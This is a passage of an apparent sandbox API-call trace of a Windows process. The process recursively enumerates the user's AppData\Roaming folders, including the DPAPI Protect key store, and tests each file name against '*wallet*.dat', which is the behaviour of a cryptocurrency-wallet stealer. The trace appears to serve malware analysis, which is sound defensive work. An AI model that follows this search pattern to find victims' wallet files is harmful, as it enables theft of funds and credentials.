ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0xcf6b6c82, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="26d4f968-a540-431b-ab1b-a50e9bbda5d1", cAlternateFileName="26D4F9~1")) returned 1 [0175.465] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\26d4f968-a540-431b-ab1b-a50e9bbda5d1") returned 139 [0175.465] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\26d4f968-a540-431b-ab1b-a50e9bbda5d1") returned 101 [0175.465] PathMatchSpecA (pszFile="26d4f968-a540-431b-ab1b-a50e9bbda5d1", pszSpec="*wallet*.dat") returned 0 [0175.465] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\26d4f968-a540-431b-ab1b-a50e9bbda5d1\\*") returned 141 [0175.465] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\26d4f968-a540-431b-ab1b-a50e9bbda5d1\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\26d4f968-a540-431b-ab1b-a50e9bbda5d1\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x562658a2, ftCreationTime.dwLowDateTime=0x1d82a22, ftCreationTime.dwHighDateTime=0x562658a2, ftLastAccessTime.dwLowDateTime=0x1d82a22, ftLastAccessTime.dwHighDateTime=0xcf6b6c82, ftLastWriteTime.dwLowDateTime=0x1d85953, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1d4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x360032, cFileName="d", cAlternateFileName="C")) returned 0xffffffff [0175.465] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9a745757, ftCreationTime.dwHighDateTime=0x1d75217, ftLastAccessTime.dwLowDateTime=0x9a745757, ftLastAccessTime.dwHighDateTime=0x1d75217, ftLastWriteTime.dwLowDateTime=0xcf6e7ae7, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="b1182ce8-69d1-4194-8156-bc78cfec3a39", cAlternateFileName="B1182C~1")) returned 1 [0175.465] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39") returned 139 [0175.465] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39") returned 101 [0175.465] PathMatchSpecA (pszFile="b1182ce8-69d1-4194-8156-bc78cfec3a39", pszSpec="*wallet*.dat") returned 0 [0175.465] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39\\*") returned 141 [0175.465] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\b1182ce8-69d1-4194-8156-bc78cfec3a39\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x9a745757, ftCreationTime.dwLowDateTime=0x1d75217, ftCreationTime.dwHighDateTime=0x9a745757, ftLastAccessTime.dwLowDateTime=0x1d75217, ftLastAccessTime.dwHighDateTime=0xcf6e7ae7, ftLastWriteTime.dwLowDateTime=0x1d85953, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1d4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x310062, cFileName="1", cAlternateFileName="C")) returned 0xffffffff [0175.466] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xde7dde0f, ftCreationTime.dwHighDateTime=0x1d7b055, ftLastAccessTime.dwLowDateTime=0xde7dde0f, ftLastAccessTime.dwHighDateTime=0x1d7b055, ftLastWriteTime.dwLowDateTime=0xcf714bf2, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="be39cc84-e9bf-4c2d-a3a5-e953c9f3df24", cAlternateFileName="BE39CC~1")) returned 1 [0175.466] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\be39cc84-e9bf-4c2d-a3a5-e953c9f3df24") returned 139 [0175.466] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\be39cc84-e9bf-4c2d-a3a5-e953c9f3df24") returned 101 [0175.466] PathMatchSpecA (pszFile="be39cc84-e9bf-4c2d-a3a5-e953c9f3df24", pszSpec="*wallet*.dat") returned 0 [0175.466] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\be39cc84-e9bf-4c2d-a3a5-e953c9f3df24\\*") returned 141 [0175.466] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\be39cc84-e9bf-4c2d-a3a5-e953c9f3df24\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\be39cc84-e9bf-4c2d-a3a5-e953c9f3df24\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0xde7dde0f, ftCreationTime.dwLowDateTime=0x1d7b055, ftCreationTime.dwHighDateTime=0xde7dde0f, ftLastAccessTime.dwLowDateTime=0x1d7b055, ftLastAccessTime.dwHighDateTime=0xcf714bf2, ftLastWriteTime.dwLowDateTime=0x1d85953, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1d4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650062, cFileName="3", cAlternateFileName="C")) returned 0xffffffff [0175.466] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xcf741f26, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="cfeedb70-e610-451b-90c2-def194b5fe80", cAlternateFileName="CFEEDB~1")) returned 1 [0175.466] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80") returned 139 [0175.466] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80") returned 101 [0175.466] PathMatchSpecA (pszFile="cfeedb70-e610-451b-90c2-def194b5fe80", pszSpec="*wallet*.dat") returned 0 [0175.466] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80\\*") returned 141 [0175.466] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x5088b163, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x5088b163, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0xcf741f26, ftLastWriteTime.dwLowDateTime=0x1d85953, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1d4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x660063, cFileName="e", cAlternateFileName="C")) returned 0xffffffff [0175.466] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x80631a6d, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0175.466] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred") returned 112 [0175.466] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred") returned 74 [0175.466] PathMatchSpecA (pszFile="Preferred", pszSpec="*wallet*.dat") returned 0 [0175.467] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred\\*") returned 114 [0175.467] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\preferred\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x5088b163, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x5088b163, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x80631a6d, ftLastWriteTime.dwLowDateTime=0x1d8a649, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x18, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x720050, cFileName="e", cAlternateFileName="C")) returned 0xffffffff [0175.467] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x80631a6d, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0175.467] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.467] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xcf753085, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0175.467] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0175.467] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\SYNCHIST") returned 26 [0175.467] PathMatchSpecA (pszFile="SYNCHIST", pszSpec="*wallet*.dat") returned 0 [0175.467] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST\\*") returned 66 [0175.467] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\synchist\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x44792966, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x44792966, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0xcf753085, ftLastWriteTime.dwLowDateTime=0x1d85953, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4c, nFileSizeLow=0x18, dwReserved0=0x207d0, dwReserved1=0x590053, cFileName="N", cAlternateFileName="PREFER~1Ð\x07\x02")) returned 0xffffffff [0175.467] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xcf753085, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0175.467] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.467] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c, dwReserved1=0x18, cFileName="Spelling", cAlternateFileName="")) returned 1 [0175.467] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling") returned 56 [0175.467] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Microsoft\\Spelling") returned 18 [0175.468] PathMatchSpecA (pszFile="Spelling", pszSpec="*wallet*.dat") returned 0 [0175.468] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\*") returned 58 [0175.468] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\spelling\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.469] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.469] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="en-US", cAlternateFileName="")) returned 1 [0175.469] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US") returned 62 [0175.469] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Microsoft\\Spelling\\en-US") returned 24 [0175.469] PathMatchSpecA (pszFile="en-US", pszSpec="*wallet*.dat") returned 0 [0175.469] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\*") returned 64 [0175.469] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\spelling\\en-us\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.469] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.469] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x567d5b26, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xbfbb9feb, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.acl", cAlternateFileName="")) returned 1 [0175.469] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.acl") returned 74 [0175.469] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Spelling\\en-US\\default.acl") returned 36 [0175.469] PathMatchSpecA (pszFile="default.acl", pszSpec="*wallet*.dat") returned 0 [0175.469] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.acl\\*") returned 76 [0175.469] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.acl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\spelling\\en-us\\default.acl\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x567d5b26, ftCreationTime.dwLowDateTime=0x1d70460, ftCreationTime.dwHighDateTime=0x567d5b26, ftLastAccessTime.dwLowDateTime=0x1d70460, ftLastAccessTime.dwHighDateTime=0xbfbb9feb, ftLastWriteTime.dwLowDateTime=0x1d8a64a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650064, cFileName="f", cAlternateFileName="C")) returned 0xffffffff [0175.470] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5648e4eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5648e4eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xbfbb3e6f, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.dic", cAlternateFileName="")) returned 1 [0175.470] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.dic") returned 74 [0175.470] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Spelling\\en-US\\default.dic") returned 36 [0175.470] PathMatchSpecA (pszFile="default.dic", pszSpec="*wallet*.dat") returned 0 [0175.470] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.dic\\*") returned 76 [0175.470] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.dic\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\spelling\\en-us\\default.dic\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x5648e4eb, ftCreationTime.dwLowDateTime=0x1d70460, ftCreationTime.dwHighDateTime=0x5648e4eb, ftLastAccessTime.dwLowDateTime=0x1d70460, ftLastAccessTime.dwHighDateTime=0xbfbb3e6f, ftLastWriteTime.dwLowDateTime=0x1d8a64a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650064, cFileName="f", cAlternateFileName="C")) returned 0xffffffff [0175.470] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a47fe, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x566a47fe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xbfbb652a, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.exc", cAlternateFileName="")) returned 1 [0175.470] wsprintfA (in: param_1=0x196ee4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.exc") returned 74 [0175.470] wsprintfA (in: param_1=0x196fec, param_2="%s\\%s" | out: param_1="Microsoft\\Spelling\\en-US\\default.exc") returned 36 [0175.470] PathMatchSpecA (pszFile="default.exc", pszSpec="*wallet*.dat") returned 0 [0175.470] wsprintfA (in: param_1=0x196bb4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.exc\\*") returned 76 [0175.470] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.exc\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\spelling\\en-us\\default.exc\\*"), lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x566a47fe, ftCreationTime.dwLowDateTime=0x1d70460, ftCreationTime.dwHighDateTime=0x566a47fe, ftLastAccessTime.dwLowDateTime=0x1d70460, ftLastAccessTime.dwHighDateTime=0xbfbb652a, ftLastWriteTime.dwLowDateTime=0x1d8a64a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650064, cFileName="f", cAlternateFileName="C")) returned 0xffffffff [0175.470] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a47fe, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x566a47fe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xbfbb652a, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.exc", cAlternateFileName="")) returned 0 [0175.470] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.470] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="en-US", cAlternateFileName="")) returned 0 [0175.470] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.470] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, 